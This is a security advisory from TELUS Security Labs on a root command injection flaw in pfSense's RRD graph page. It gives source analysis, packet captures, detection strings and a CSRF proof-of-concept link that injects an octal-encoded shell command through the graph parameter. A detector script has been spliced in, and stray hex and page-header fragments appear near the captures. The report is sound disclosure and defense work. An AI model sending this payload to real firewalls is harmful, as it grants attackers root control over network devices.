TELUS Security Labs Vulnerability Research Service
ESF pfSense status_rrd_graph_img.php Command Injection Vulnerability Report - TSL20160419-04
Revision 1.0
Revision History: Revision 1.0, 2016-05-02
Copyright © 2004-2012 TELUS Security Labs PROPRIETARY AND CONFIDENTIAL
Table of Contents
1. Identity of Problem
  1.1. Brief Description
  1.2. CVE Reference
  1.3. OSVDB Reference
  1.4. Vendor Advisory
  1.5. Discoverer Advisory
  1.6. Other Advisories
  1.7. Notes
  1.8. Vulnerability Classification and Severity
2. Affected Products
  2.1. Products Directly Affected by the Vulnerability
  2.2. Other Products Embedding the Vulnerable Product
3. Problem Location
  3.1. Program
  3.2. Function or Method
  3.3. Parameters
  3.4. Data Objects
4. Problem Mechanism
  4.1. Technical Mechanism
  4.2. Source Code Walkthrough
  4.3. Open Questions to Resolve
5. Triggering the Problem
  5.1. Prerequisites
  5.2. Triggering Conditions
  5.3. Protocol Flow Diagram
  5.4. Attack Delivery
  5.5. Packet Decodes
6. Attack Detection
  6.1. Remote Detection of Generic Attacks
  6.2. Remote Detection of Known Exploits
7. Exploit Reproduction
  7.1. Exploit Overview
  7.2. Exploit Code
8. Public Exploits
  8.1. Public Exploit [SA]
9. Remediation Details
10. Related Research
11. Credits
1. Identity of Problem

1.1. Brief Description
A Command Injection vulnerability has been reported in ESF pfSense. The vulnerability exists because status_rrd_graph_img.php does not adequately validate the graph HTTP parameter before interpolating it into a shell command. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the status_rrd_graph_img.php URI. A remote, unauthenticated attacker can also exploit it through a CSRF vulnerability by enticing a user who is logged in to the webConfigurator to issue the crafted request. Successful exploitation results in arbitrary command execution with root privileges.
1.2. CVE Reference
This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

1.3. OSVDB Reference
This vulnerability has not been assigned an Open Source Vulnerability Database (OSVDB) identifier.

1.4. Vendor Advisory
The vendor, ESF, has released an advisory addressing this vulnerability with the unique identifier pfSense-SA-16_01, dated 2016-04-01.
Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc

1.5. Discoverer Advisory
The discoverer, Francesco Oddo, has released an advisory addressing this vulnerability, dated 2016-04-15.
Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

1.6. Other Advisories
There are no other advisories available.

1.7. Notes
Not available.
1.8. Vulnerability Classification and Severity
1.8.1. TELUS Security Labs Classification
Vulnerability impact: COMMAND EXECUTION
Vulnerability type: INPUT VALIDATION ERROR

1.8.2. Common Weakness Enumeration (CWE) Classification
• CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Reference: https://cwe.mitre.org/data/definitions/78.html
1.8.3. Severity
The severity classification of this vulnerability is high. This rating was determined through consideration of the following factors:
• Exploit code is publicly available.
• This is a server compromise.
• The vulnerability, if exploited, can lead to a root or system-level compromise.
• The software affected by this vulnerability is significantly deployed.
• The assets affected by this vulnerability are estimated to be of high value.
• The attacker must have limited user privileges.

1.8.4. Common Vulnerability Scoring System (CVSS)
Base score is 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C), based on the following metrics:
• Access vector is network.
• Access complexity is medium.
• Level of authentication required is single.
• Impact of this vulnerability on data confidentiality is complete.
• Impact of this vulnerability on data integrity is complete.
• Impact of this vulnerability on data availability is complete.
Temporal score is 7.0 (E:F/RL:OF/RC:C), based on the following metrics:
• The exploitability level of this vulnerability is functional.
• The remediation level of this vulnerability is official fix.
• The report confidence level of this vulnerability is confirmed.
2. Affected Products

2.1. Products Directly Affected by the Vulnerability
• Electric Sheep Fencing pfSense prior to 2.3

2.2. Other Products Embedding the Vulnerable Product
Not applicable.
3. Problem Location

3.1. Program
The vulnerable program is status_rrd_graph_img.php.

3.2. Function or Method
There is no dedicated sanitizing function; the vulnerable code is the inline str_replace() denylist in status_rrd_graph_img.php that is meant to strip shell metacharacters from the graph parameter before the value is interpolated into $graphcmd and passed to exec().

3.3. Parameters
The vulnerable parameter is the HTTP parameter graph.

3.4. Data Objects
Not available.
4. Problem Mechanism

4.1. Technical Mechanism
pfSense is an open source network firewall distribution based on the FreeBSD operating system. The distribution provides a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed either through the CLI or through a web interface called the webConfigurator. The webConfigurator is a web application capable of configuring and managing the firewall as well as other components of the pfSense distribution. All interaction with the interface is performed via HTTP over port 80/TCP or HTTPS over port 443/TCP.

HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body:

    Request      = Request-Line headers CRLF [message-body]
    Request-Line = Method SP Request-URI SP HTTP-Version CRLF
    Headers      = *[Header]
    Header       = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF), and SP represents a space character. Parameters can be passed from the client to the server as name-value pairs either in the Request-URI or in the message body, depending on the Method used and the Content-Type header. For example, a simple HTTP request passing a parameter named "param" with value "1" using the GET method might look like:

    GET /my_webapp/mypage.htm?param=1 HTTP/1.1
    Host: www.myhost.com

A corresponding HTTP request using the POST method might look like:

    POST /my_webapp/mypage.htm HTTP/1.1
    Host: www.myhost.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 7

    param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:

    var1=value1&var2=value2...

A command injection vulnerability exists in ESF pfSense. The vulnerability is due to status_rrd_graph_img.php incorrectly sanitizing the graph HTTP parameter. The script removes a denylist of characters (<, >, ;, &, ', ", . and /) from the parameter but does not remove the pipe "|" (ASCII 0x7C) or grave accent "`" (ASCII 0x60) characters. The filtered value is then interpolated into a shell command string, $graphcmd, which is executed with the PHP exec() function. Because the webConfigurator's PHP code runs as root, any command injected through the pipe runs as root as well. Note that the removal of "." and "/" prevents an injected command from containing a path or file extension directly; the public proof of concept works around this by piping a printf format string of octal escapes into sh, so the path is only reconstructed once the injected shell is already running. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice an authenticated user to exploit this vulnerability. Successful exploitation results in arbitrary command execution with root privileges.
4.2. Source Code Walkthrough
The following code snippet was taken from status_rrd_graph_img.php version 2.2.6. Comments added by TELUS Security Labs are prefixed with //.

    $pgtitle = array(gettext("System"),gettext("RRD Graphs"),gettext("Image viewer"));
    if ($_GET['database']) { //this param not exploitable due to later checks
        $curdatabase = basename($_GET['database']);
        $curdatabase = str_replace(array("<", ">", ";", "&", "'", '"'), "",
            htmlspecialchars_decode($curdatabase, ENT_QUOTES | ENT_HTML401));
    } else {
        $curdatabase = "wan-traffic.rrd";
    }
    if ($_GET['style']) {
        $curstyle = $_GET['style'];
    } else {
        $curstyle = "inverse";
    }
    /* this is used for temp name */
    if ($_GET['graph']) { //no check for "|" or "`"
        $curgraph = str_replace(array("<", ">", ";", "&", "'", '"', '.', '/'), "",
            htmlspecialchars_decode($_GET['graph'], ENT_QUOTES | ENT_HTML401));
    } else {
        $curgraph = "custom";
    }
    [...Truncated for readability...]
    //vulnerable exec() below
    //$curgraph is used to generate $graphcmd
    if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) {
        if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15 ) {
            if ($data) {
                $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
                $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
                flush();
                usleep(500);
            }
        }
    } else {
        if ($data) {
            $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
            $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
            flush();
            usleep(500);
        }
    }
4.3. Open Questions to Resolve
Not available.
5. Triggering the Problem

5.1. Prerequisites
• The server must have the vulnerable product installed and running.
• The attacker must either hold valid webConfigurator credentials, or be able to entice a user who is logged in to the webConfigurator to visit a malicious website.

5.2. Triggering Conditions
The attacker sends, or entices an authenticated user to send, an HTTP request to status_rrd_graph_img.php containing shell commands in the graph parameter. The vulnerability is triggered when the server processes this request.

5.3. Protocol Flow Diagram
5.3.1. Request/responses sequences, static or negotiated/ephemeral ports, etc
An authenticated target user is enticed to click on a hyperlink:

    [ Attacker ] -----------------> [ Target User ]

The target user sends the crafted HTTP request to the target server:

    [ Target User ] -----------------> [ Target Server ]

5.4. Attack Delivery
5.4.1. Application protocols
The following application protocols can be used to deliver an attack that exploits this vulnerability:
• HTTP, over port 80/TCP
• HTTPS, over port 443/TCP

5.4.2. IP protocols
Not available.

5.4.3. File based vectors
Not available.

5.4.4. Notes
Not applicable.
5.5. Packet Decodes
5.5.1. Normal traffic (baseline)
The following packet decode illustrates a normal packet exchange. Please refer to the attached file normal.pcap for details.

A client sends a request:

Frame 4: 492 bytes on wire (3936 bits), 492 bytes captured (3936 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192)
Transmission Control Protocol, Src Port: 49344 (49344), Dst Port: http (80), Seq: 1, Ack: 1, Len: 438
Hypertext Transfer Protocol
    GET /status_rrd_graph_img.php HTTP/1.1\r\n
    Host: 172.16.8.192\r\n
    Connection: keep-alive\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
    Upgrade-Insecure-Requests: 1\r\n
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n
    Accept-Encoding: gzip, deflate, sdch\r\n
    Accept-Language: en-US,en;q=0.8\r\n
    Cookie: PHPSESSID=35edee32158c1a2a39b76b97ca8eaaa6\r\n
    \r\n
[Raw hex dump of the frame omitted.]
The server responds:

Frame 6: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460
Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
    Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n
    Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
    Cache-Control: max-age=180000\r\n
    Cache-Control: no-store, no-cache, must-revalidate\r\n
    Cache-Control: post-check=0, pre-check=0\r\n
    X-Frame-Options: SAMEORIGIN\r\n
    Content-type: image/png\r\n
    Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n
    Pragma: no-cache\r\n
    Transfer-Encoding: chunked\r\n
    Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n
    Server: lighttpd/1.4.38\r\n
    \r\n
HTTP chunked response (PNG image data)
[Raw hex dump of the frame omitted.]
5.5.2. Attack cases
The following packet decode illustrates an attack packet exchange. Please refer to the attached file attack.pcap for details.

A client is enticed to visit a malicious website:

Frame 4: 444 bytes on wire (3552 bits), 444 bytes captured (3552 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.1.2 (172.16.1.2)
Transmission Control Protocol, Src Port: 49359 (49359), Dst Port: http (80), Seq: 1, Ack: 1, Len: 390
Hypertext Transfer Protocol
    GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n
    Host: 172.16.1.2\r\n
    Connection: keep-alive\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
    Upgrade-Insecure-Requests: 1\r\n
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n
    Accept-Encoding: gzip, deflate, sdch\r\n
    Accept-Language: en-US,en;q=0.8\r\n
    \r\n
[Raw hex dump of the frame omitted.]
The malicious server responds:

Frame 6: 717 bytes on wire (5736 bits), 717 bytes captured (5736 bits)
Ethernet II, Src: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.1.2 (172.16.1.2), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49359 (49359), Seq: 1, Ack: 391, Len: 663
Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
    Date: Thu, 28 Apr 2016 18:47:12 GMT\r\n
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 mod_wsgi/3.4 Python/2.7.5\r\n
    Last-Modified: Thu, 28 Apr 2016 18:31:18 GMT\r\n
    ETag: "133-5318fbb6ba130"\r\n
    Accept-Ranges: bytes\r\n
    Content-Length: 307\r\n
    Keep-Alive: timeout=5, max=100\r\n
    Connection: Keep-Alive\r\n
    Content-Type: text/html; charset=UTF-8\r\n
    \r\n
Line-based text data: text/html
    [307-byte HTML page titled "TELUS Security Labs PoC" containing a hyperlink labelled "Click here for PoC"; the link target is truncated in the capture and is not reproduced here.]
[Raw hex dump of the frame omitted.]
The client sends the crafted request to the target server:

Frame 11: 680 bytes on wire (5440 bits), 680 bytes captured (5440 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192)
Transmission Control Protocol, Src Port: 49360 (49360), Dst Port: http (80), Seq: 1, Ack: 1, Len: 626
Hypertext Transfer Protocol
    GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo HTTP/1.1\r\n   << suspicious content
    Host: 172.16.8.192\r\n
    Connection: keep-alive\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
    Upgrade-Insecure-Requests: 1\r\n
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36\r\n
    Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n
    Accept-Encoding: gzip, deflate, sdch\r\n
    Accept-Language: en-US,en;q=0.8\r\n
    Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n
    \r\n
[Raw hex dump of the frame omitted.]

The graph value contains none of the characters the script strips, so it reaches $graphcmd intact. When /bin/sh parses the command, each unquoted "\\" collapses to "\", printf receives the format string \164\157\165\143\150\040\057\164\155\160\057\164\145\163\164, and its octal escapes expand to the string "touch /tmp/test", which the following "|sh" executes as root. The trailing "|echo" consumes the remainder of $graphcmd so that the rest of the rrdtool argument list does not cause a syntax error. The Referer header shows that the request was issued by the browser from the attacker's page, not by the user typing it.
The server responds:

Frame 13: 667 bytes on wire (5336 bits), 667 bytes captured (5336 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49360 (49360), Seq: 1, Ack: 627, Len: 613
Hypertext Transfer Protocol
    HTTP/1.1 200 OK\r\n
    Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n
    Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
    Cache-Control: max-age=180000\r\n
    Cache-Control: no-store, no-cache, must-revalidate\r\n
    Cache-Control: post-check=0, pre-check=0\r\n
    X-Frame-Options: SAMEORIGIN\r\n
    Content-type: image/png\r\n
    Last-Modified: Thu, 28 Apr 2016 18:48:52 GMT\r\n
    Pragma: no-cache\r\n
    Transfer-Encoding: chunked\r\n
    Date: Thu, 28 Apr 2016 18:48:52 GMT\r\n
    Server: lighttpd/1.4.38\r\n
    \r\n
HTTP chunked response
Media Type: image/png (175 bytes)
[Raw hex dump of the frame omitted.]
6f 63 61 6c 2f 77 72 72 64 5f 67 72 70 20 6f 6e 20 6c 0a
in /usr/local/w ww/status_rrd_gr aph_img.php on l ine 1272...
TELUS Security Labs Vulnerability Research Service
68 2e 65 32 54 20 30 2d 65 43 65 74 63 74 68 4f 47 65 73 2c 3a 6d 61 20 54 20 65 31
Revision 1.0
cd 31 73 30 0d 32 30 43 3d 6f 2c 2d 68 2d 65 70 49 3a 74 20 34 61 6e 63 68 31 72 2e
50 20 3a 31 0a 36 3a 6f 31 6e 20 72 65 63 63 74 4e 20 2d 32 38 3a 73 68 75 38 76 34
14
ESF pfSense status_rrd_graph_img.php Command Injection
Revision 1.0
6. Attack Detection

6.1. Remote Detection of Generic Attacks

pfSense enforces HTTPS by default. In order to detect a generic attack using this vulnerability, the detection device must decrypt the HTTPS packets and monitor the HTTP traffic on the ports mentioned in the section entitled "Attack Delivery".

HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various headers, an empty line, and an optional message body:

Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF), and SP represents a space character. Parameters can be passed from the client to the server as name-value pairs in either the Request-URI or in the message-body, depending on the Method used and the Content-Type header. For example, a simple HTTP request passing a parameter named "param" with value "1", using the GET method, might look like:

GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com

A corresponding HTTP request using the POST method might look like:

POST /my_webapp/mypaget.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:

var1=value1&var2=value2...
The detection device must look for HTTP requests to the following URI: /status_rrd_graph_img.php
If a request to this URI is found, the detection device must analyze the value assigned to the request parameter graph. If the value contains a pipe character "|" (or its case-insensitive URL-encoding, %7C), or the grave accent "`" character (or in URL-encoded form, %60), then an attack exploiting this vulnerability is likely underway. Note: All string matching described above must be done in a case-sensitive manner.
6.2. Remote Detection of Known Exploits

The generic detection described above is capable of detecting all known exploits for this vulnerability; however, if the detection device would like to isolate cases using the public exploit provided by Francesco Oddo, it can do so by searching for the following strings:

String 1: \\145\\143\\150\\157
String 2: \\160\\150\\160
String 3: |
String 4: status_rrd_graph_img.php
String 5: graph=

If all of these strings are detected then an attack using the public exploit is likely underway.
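A worked detector for the checks in sections 6.1 and 6.2, added here as an example and not code from the TELUS report or from pfSense: it parses a raw HTTP request, pulls the graph parameter from either the Request-URI or a form-encoded POST body (both forms described in 6.1), applies the generic pipe/grave-accent test without URL-decoding the value (so the %7C and %60 forms stay visible), and separately tests the five-string signature from 6.2. The sample requests are constructed for the demonstration; the second mirrors the request in the packet capture above, and the "public-style" sample only reproduces the five signature strings, not the actual public exploit.

```python
# Added example, not from the TELUS report: applies the section 6 detection
# logic to raw HTTP requests. The sample requests at the bottom are constructed.

TARGET_URI = "/status_rrd_graph_img.php"

# Section 6.1: pipe or grave accent in the graph parameter, literal or
# URL-encoded. Literal characters match case-sensitively; the percent
# encoding of "|" is accepted in either case, as the report allows.
GENERIC_TOKENS = ("|", "%7C", "%7c", "`", "%60")

# Section 6.2: all five strings must be present to flag the public exploit.
# Raw strings keep the doubled backslashes exactly as they appear on the wire.
KNOWN_EXPLOIT_STRINGS = (
    r"\\145\\143\\150\\157",     # String 1
    r"\\160\\150\\160",          # String 2
    "|",                         # String 3
    "status_rrd_graph_img.php",  # String 4
    "graph=",                    # String 5
)


def parse_request(raw):
    """Split a raw HTTP request into (method, request_uri, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, request_uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, request_uri, headers, body


def raw_params(encoded):
    """Split name=value&name=value pairs WITHOUT URL-decoding them, so that
    encoded metacharacters such as %7C remain visible to the checks."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def request_params(method, request_uri, headers, body):
    """Return (path, params): parameters from the query string, plus the
    message body when the request is a form-encoded POST."""
    path, _, query = request_uri.partition("?")
    params = raw_params(query)
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        params.update(raw_params(body))
    return path, params


def detect(raw):
    """Apply both section 6 checks to one raw request and report the outcome."""
    method, request_uri, headers, body = parse_request(raw)
    path, params = request_params(method, request_uri, headers, body)
    result = {"generic": False, "known_exploit": False}
    if path != TARGET_URI:
        return result
    graph = params.get("graph", "")
    result["generic"] = any(tok in graph for tok in GENERIC_TOKENS)
    result["known_exploit"] = all(s in raw for s in KNOWN_EXPLOIT_STRINGS)
    return result


# Constructed samples (host 172.16.8.192 taken from the report's capture).
BENIGN = ("GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file HTTP/1.1\r\n"
          "Host: 172.16.8.192\r\n\r\n")
# Mirrors the request shown in the packet capture earlier in this report.
CAPTURED = ("GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20"
            r"\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo"
            " HTTP/1.1\r\nHost: 172.16.8.192\r\n\r\n")
# Constructed to contain the five section 6.2 strings; not the public exploit.
PUBLIC_STYLE = ("GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20"
                r"\\145\\143\\150\\157\\040\\160\\150\\160|sh"
                " HTTP/1.1\r\nHost: 172.16.8.192\r\n\r\n")
# Same parameters delivered in a POST body, with the pipe percent-encoded in lower case.
POST_ENCODED = ("POST /status_rrd_graph_img.php HTTP/1.1\r\nHost: 172.16.8.192\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 39\r\n\r\n"
                "database=-throughput.rrd&graph=file%7cx")
# A pipe in the graph parameter of some other URI is out of scope for this check.
OTHER_URI = "GET /index.php?graph=a|b HTTP/1.1\r\nHost: 172.16.8.192\r\n\r\n"

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("captured", CAPTURED),
                          ("public-style", PUBLIC_STYLE), ("post", POST_ENCODED),
                          ("other-uri", OTHER_URI)]:
        print(label, detect(sample))
```

The captured TELUS request trips the generic check but not the five-string signature (its payload contains neither the octal-escaped "echo" nor "php"), which is the distinction section 6.2 draws between generic and known-exploit detection.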
7. Exploit Reproduction

7.1. Exploit Overview

TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To trigger the vulnerability, click the hyperlink embedded within the HTML. Upon processing, a file named "test" should be created in the "/tmp/" directory of pfSense. Note that before this POC is used the "" string should be replaced with the IP address of the machine running pfSense. The user clicking on the hyperlink should be an authenticated pfSense user.

7.2. Exploit Code

TELUS Security Labs PoC

<a href="[...]/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo">Click here for PoC</a>
8. Public Exploits

8.1. Public Exploit [SA]

8.1.1. Exploit overview

The discoverer has published a proof-of-concept exploit demonstrating this vulnerability. The exploit has been made available via:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
9. Remediation Details

The risks posed by this vulnerability can be mitigated or eliminated by:
• Applying the vendor-provided patch to eliminate the vulnerability.
• Filtering attack traffic using information provided in the "Attack Detection" section.
• Not visiting untrusted websites.

The vendor has released the following advisory regarding this vulnerability:
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
10. Related Research

Not available.
11. Credits

Principal contributors, researchers, and reviewers for this report include the following members of the TELUS Security Labs Research Team:
• Vincent Lee
• Sivathmican Sivakumaran